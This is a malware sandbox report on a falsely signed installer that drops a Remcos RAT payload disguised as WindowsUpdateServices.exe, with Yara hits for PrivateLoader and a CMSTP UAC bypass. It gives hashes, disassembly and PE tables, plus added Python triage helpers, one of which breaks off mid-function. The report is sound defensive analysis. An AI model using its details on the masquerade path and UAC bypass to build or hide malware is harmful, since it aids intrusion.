                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):494592
                                                                                                                                                                                                                                Entropy (8bit):6.59991321032667
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:6XIktXfM8Lv86r9uVWAa2je4Z5zl4hgDHQQs4NTQjoHFsAOZZDAXYcN45Gv:6X7tPMK8ctGe4Dzl4h2QnuPs/ZDdcv
                                                                                                                                                                                                                                MD5:E5C79A33139A13DAAC52DA8DD0ABFC68
                                                                                                                                                                                                                                SHA1:87568DBF15EC652132892D6F222C2D0C47DAD44A
                                                                                                                                                                                                                                SHA-256:8B691CA989510FC11A91665593B98C42B9DF5FD1982F2F16D5194121F12C1A27
                                                                                                                                                                                                                                SHA-512:E61B19E0547BA6AA6753E1DAEC17B804A608BF478EEAED7E6EAE65640F874EA66D011837C49283C2985778CAF433345C45079CF4C09658FF9751D060CD6F9A00
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: unknown
                                                                                                                                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: unknown
                                                                                                                                                                                                                                 • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: ditekSHen
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........-H..~H..~H..~.f$~[..~.f&~...~.f'~V..~A.Q~I..~.Z.~J..~...R..~...r..~...j..~A.F~Q..~H..~u..~....,..~..*~I..~....I..~RichH..~................PE..L...[1.e.................r...........I............@.......................... ...........................................................K.......................;..@...8...........................x...@............................................text...uq.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....K.......L..................@..@.reloc...;.......<...P..............@..B........................................................................................................................................................................................................
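The dropped-file records above mix two very different things: a run of identical 60-byte text files that powershell.exe writes on every start to probe AppLocker lockdown mode (SHA-256 96AD1146...DCF7; outside this report they are known as PowerShell's __PSScriptPolicyTest_*.ps1 files), which are startup noise rather than an indicator, and a single 494592-byte PE32 written by bound.exe that carries Remcos and CMSTP UAC-bypass Yara hits whose Source field shows where the payload landed (WindowsUpdateServices.exe under Roaming). The script below is an added triage helper, not part of the Joe Sandbox report: it parses the flattened "Key:Value" record format as it appears on this page, collapses repeated records by SHA-256, and surfaces only the drops that are flagged or match a rule. The sample text is constructed from the records above; the record layout it assumes (each record starts at a "Process:" line, Yara hits are bullet lines following "Yara Hits:") is taken from this page and may differ in other report exports.

```python
"""Triage helper for the dropped-files section of a sandbox report (added example)."""
import re
from collections import OrderedDict

# SHA-256 of the 60-byte AppLocker policy probe that powershell.exe writes on
# start-up (value copied from the report; treating it as noise is this
# script's assumption, not a statement made by the report).
PS_POLICY_PROBE_SHA256 = "96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7"

YARA_LINE = re.compile(
    r"^• Rule: (?P<rule>.*?), Description: (?P<desc>.*?), "
    r"Source: (?P<source>.*?), Author: (?P<author>.*)$"
)

# Constructed sample: three records trimmed to the fields used here; all values
# are copied from the report above (two copies of the probe, one malicious PE).
SAMPLE = r"""
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\AppData\Local\Temp\bound.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):494592
MD5:E5C79A33139A13DAAC52DA8DD0ABFC68
SHA-256:8B691CA989510FC11A91665593B98C42B9DF5FD1982F2F16D5194121F12C1A27
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: ditekSHen
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
"""


def parse_records(text):
    """Split the flattened listing into one dict per dropped file.

    A record starts at every 'Process:' line. Bullet lines after 'Yara Hits:'
    are collected into the record's 'Yara Hits' list; every other line is
    split at its first colon into key and value.
    """
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Process:"):
            current = {"Process": line[len("Process:"):], "Yara Hits": []}
            records.append(current)
            continue
        if current is None:
            continue  # text before the first record is ignored
        hit = YARA_LINE.match(line)
        if hit:
            current["Yara Hits"].append(hit.groupdict())
            continue
        key, sep, value = line.partition(":")
        if sep and key != "Yara Hits":  # 'Yara Hits:' itself carries no value
            current[key] = value
    return records


def group_by_sha256(records):
    """Collapse repeated records with identical content: sha256 -> [record, count]."""
    groups = OrderedDict()
    for rec in records:
        sha = rec.get("SHA-256", "").upper()
        if sha in groups:
            groups[sha][1] += 1
        else:
            groups[sha] = [rec, 1]
    return groups


def triage(text):
    """Return counts plus one summary per unique drop that is flagged or has Yara hits."""
    records = parse_records(text)
    groups = group_by_sha256(records)
    report = {"total": len(records), "unique": len(groups),
              "noise": groups.get(PS_POLICY_PROBE_SHA256, [None, 0])[1],
              "malicious": []}
    for sha, (rec, count) in groups.items():
        if rec.get("Malicious") == "true" or rec["Yara Hits"]:
            report["malicious"].append({
                "sha256": sha,
                "dropper": rec["Process"],
                "copies": count,
                "rules": sorted({h["rule"] for h in rec["Yara Hits"]}),
                "sources": sorted({h["source"] for h in rec["Yara Hits"]}),
            })
    return report


if __name__ == "__main__":
    for item in triage(SAMPLE)["malicious"]:
        print(item["sha256"], "written by", item["dropper"], "->", item["sources"])
```

Run against the full dropped-files section, the "noise" count tells you how many PowerShell starts the sample triggered, while the "malicious" list reduces to the hashes and on-disk paths worth blocking or hunting for; the dropper/source pairing (bound.exe writing into Roaming\WindowsUpdateServices) is what you would turn into a file-creation detection.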
                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):947288
                                                                                                                                                                                                                                Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):97
                                                                                                                                                                                                                                Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Entropy (8bit):7.868067677506233
                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                File name:Og1SeeXcB2.exe
                                                                                                                                                                                                                                File size:795'405 bytes
                                                                                                                                                                                                                                MD5:150e9ffdac7f2361c2efa735929aa268
                                                                                                                                                                                                                                SHA1:3ed43e5fb5cd202d91fe31c4a0f8674e5fdb0759
                                                                                                                                                                                                                                SHA256:d54259b35ece6e39b159317128bfd62f88abbaadd92537379c4bae078e82fe69
                                                                                                                                                                                                                                SHA512:a56ef522fab3213f2f1d5a15d92615f0a039bf8f8c113e36e38f254b6d58185e5aa0449384d15ac52f1f6ac8d07159ac05d245926fba14ac61462e0911cb39a3
                                                                                                                                                                                                                                SSDEEP:24576:pMwUwtgszGQgXxHjejMOlF3NdRruHycftxFA:pMwhd0SZlp/YtTA
                                                                                                                                                                                                                                TLSH:4A0512F2AB209C7EFD57057E11334E721A67FD6A12940A2A315DF4256A3230245FEECB
                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......`.................f...*.....
                                                                                                                                                                                                                                Icon Hash:baf062fc9efae2c0
                                                                                                                                                                                                                                Entrypoint:0x40348f
                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                Time Stamp:0x60FC9193 [Sat Jul 24 22:17:55 2021 UTC]
                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                Import Hash:6e7f9a29f2c85394521a08b9f31f6275
                                                                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                Error Number:-2146869232
                                                                                                                                                                                                                                Not Before:04/05/2023 01:00:00
                                                                                                                                                                                                                                Not After:07/05/2026 00:59:59
                                                                                                                                                                                                                                Subject Chain:
                                                                                                                                                                                                                                • CN="Electronic Arts, Inc.", OU=EAC, O="Electronic Arts, Inc.", L=Redwood City, S=CALIFORNIA, C=US
                                                                                                                                                                                                                                Version:3
                                                                                                                                                                                                                                Thumbprint MD5:33BD4710688F5874BAC612E52BCCEEA8
                                                                                                                                                                                                                                Thumbprint SHA-1:A46E87AEBD8693AE8B3B2F26449F8828368B4D4F
                                                                                                                                                                                                                                Thumbprint SHA-256:0F952F3F6AF7C5B1FE753761AD34E2C360930EF530EB6A753AB461046F79C049
                                                                                                                                                                                                                                Serial:0671352DC4C103B70AE725E954486374
                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                sub esp, 000002D4h
                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                push edi
                                                                                                                                                                                                                                push 00000020h
                                                                                                                                                                                                                                pop edi
                                                                                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                                                                                push 00008001h
                                                                                                                                                                                                                                mov dword ptr [esp+14h], ebx
                                                                                                                                                                                                                                mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                                                                                mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                                                call dword ptr [004080CCh]
                                                                                                                                                                                                                                call dword ptr [004080D0h]
                                                                                                                                                                                                                                and eax, BFFFFFFFh
                                                                                                                                                                                                                                cmp ax, 00000006h
                                                                                                                                                                                                                                mov dword ptr [0042A22Ch], eax
                                                                                                                                                                                                                                je 00007FC2810BC923h
                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                call 00007FC2810BFC11h
                                                                                                                                                                                                                                cmp eax, ebx
                                                                                                                                                                                                                                je 00007FC2810BC919h
                                                                                                                                                                                                                                push 00000C00h
                                                                                                                                                                                                                                call eax
                                                                                                                                                                                                                                mov esi, 004082B0h
                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                call 00007FC2810BFB8Bh
                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                call dword ptr [00408154h]
                                                                                                                                                                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                                                                cmp byte ptr [esi], 00000000h
                                                                                                                                                                                                                                jne 00007FC2810BC8FCh
                                                                                                                                                                                                                                push 0000000Bh
                                                                                                                                                                                                                                call 00007FC2810BFBE4h
                                                                                                                                                                                                                                push 00000009h
    call 00007FC2810BFBDDh
    push 00000007h
    mov dword ptr [0042A224h], eax
    call 00007FC2810BFBD1h
    cmp eax, ebx
    je 00007FC2810BC921h
    push 0000001Eh
    call eax
    test eax, eax
    je 00007FC2810BC919h
    or byte ptr [0042A22Fh], 00000040h
    push ebp
    call dword ptr [00408038h]
    push ebx
    call dword ptr [00408298h]
    mov dword ptr [0042A2F8h], eax
    push ebx
    lea eax, dword ptr [esp+34h]
    push 000002B4h
    push eax
    push ebx
    push 004216C8h
    call dword ptr [0040818Ch]
    push 0040A2C8h
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b000 | 0x11790 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xbfaa5 | 0x2868 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6411 | 0x6600 | 1be075c408f39c844a297d85521f5b93 | False | 0.6545266544117647 | data | 6.40243296676441 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1398 | 0x1400 | e3e8d62e1d2308b175349eb9daa266c8 | False | 0.4494140625 | data | 5.137750894959169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20338 | 0x600 | 92925084f722469459e6111e8ee4a9d0 | False | 0.5013020833333334 | data | 4.020801365171916 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x10000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3b000 | 0x11790 | 0x11800 | 64d362b9eac2bf15bf326d75876c51c1 | False | 0.18024553571428573 | data | 4.7226999015624225 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3b190 | 0x11028 | Device independent bitmap graphic, 128 x 256 x 32, image size 69632 | English | United States | 0.17041279136525433
RT_DIALOG | 0x4c1b8 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x4c2b8 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x4c3d8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x4c438 | 0x14 | data | English | United States | 1.15
RT_MANIFEST | 0x4c450 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
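The three tables above (data directories, sections, resources) can be cross-checked against each other without the sample in hand. The Python below is an added consistency check, not part of the Joe Sandbox report: it recomputes the "Is in Section" column from the section table, confirms that every resource entry lies inside .rsrc, and flags sections whose virtual size dwarfs their raw size. All numeric values are transcribed from the tables above; the 4x size ratio used as a flagging threshold is an illustrative choice of this example.

```python
"""Cross-check the PE data-directory, section and resource tables of the report.

Constructed input: every value below is transcribed from the report's tables;
nothing here reads the sample itself.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int

    @property
    def end(self) -> int:
        return self.virtual_address + self.virtual_size


# Section table as printed in the report (RVA, VirtualSize, SizeOfRawData).
SECTIONS: List[Section] = [
    Section(".text",  0x1000,  0x6411,  0x6600),
    Section(".rdata", 0x8000,  0x1398,  0x1400),
    Section(".data",  0xa000,  0x20338, 0x600),
    Section(".ndata", 0x2b000, 0x10000, 0x0),
    Section(".rsrc",  0x3b000, 0x11790, 0x11800),
]

# Non-empty data directories as printed: name -> (VirtualAddress, Size).
DIRECTORIES = {
    "IMPORT":   (0x8504,  0xa0),
    "RESOURCE": (0x3b000, 0x11790),
    "SECURITY": (0xbfaa5, 0x2868),
    "IAT":      (0x8000,  0x2b0),
}

# Resource entries as printed: (type, RVA, size).
RESOURCES = [
    ("RT_ICON",       0x3b190, 0x11028),
    ("RT_DIALOG",     0x4c1b8, 0x100),
    ("RT_DIALOG",     0x4c2b8, 0x11c),
    ("RT_DIALOG",     0x4c3d8, 0x60),
    ("RT_GROUP_ICON", 0x4c438, 0x14),
    ("RT_MANIFEST",   0x4c450, 0x33e),
]


def rva_to_section(rva: int, sections: List[Section] = SECTIONS) -> Optional[Section]:
    """Return the section whose virtual range covers `rva`, or None."""
    for s in sections:
        if s.virtual_address <= rva < s.end:
            return s
    return None


def directory_sections(directories=DIRECTORIES) -> Dict[str, Optional[str]]:
    """Reproduce the report's 'Is in Section' column.

    IMAGE_DIRECTORY_ENTRY_SECURITY is the one entry whose VirtualAddress field
    is defined by the PE format as a raw file offset rather than an RVA, so it
    is deliberately not looked up in the section table. Here it lies far past
    the section data, i.e. in data appended to the file.
    """
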